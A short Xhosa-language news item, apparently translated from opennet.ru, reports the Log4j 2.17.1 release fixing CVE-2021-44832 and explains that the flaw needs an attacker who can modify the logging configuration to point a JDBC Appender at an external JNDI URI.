Ukukhutshwa kokulungiswa kwelayibrari ye-Log4j 2.17.1, 2.3.2-rc1 kunye ne-2.12.4-rc1 iye yapapashwa, elungisa omnye umngcipheko (CVE-2021-44832). Kukhankanyiwe ukuba ingxaki ivumela ukuphunyezwa kwekhowudi ekude (RCE), kodwa iphawulwe njenge-benign (CVSS Score 6.6) kwaye inomdla kuphela wethiyori, ekubeni ifuna iimeko ezithile zokuxhaphaza - umhlaseli kufuneka akwazi ukwenza utshintsho ifayile yesethingi Log4j, i.e. kufuneka ibenofikelelo kwinkqubo ehlaselweyo kunye negunya lokutshintsha ixabiso le-log4j2.configurationIfayile yoqwalaselo iparameter okanye wenze utshintsho kwiifayile ezikhoyo ngezicwangciso zokuloga.
Uhlaselo lubilisa ekuchazeni i-JDBC Appender-based configuration kwinkqubo yendawo ebhekiselele kwi-JNDI URI yangaphandle, ngesicelo apho iklasi yeJava inokubuyiselwa ukuze iqhutywe. Ngokungagqibekanga, i-JDBC Appender ayibulelwanga ukuphatha iiprothokholi ezingezizo ezeJava, okt. Ngaphandle kokutshintsha uqwalaselo, uhlaselo alunakwenzeka. Ukongeza, umba uchaphazela kuphela ilog4j-core JAR kwaye ayichaphazeli izicelo ezisebenzisa ilog4j-api JAR ngaphandle kwelog4j-core. ...
umthombo: opennet.ru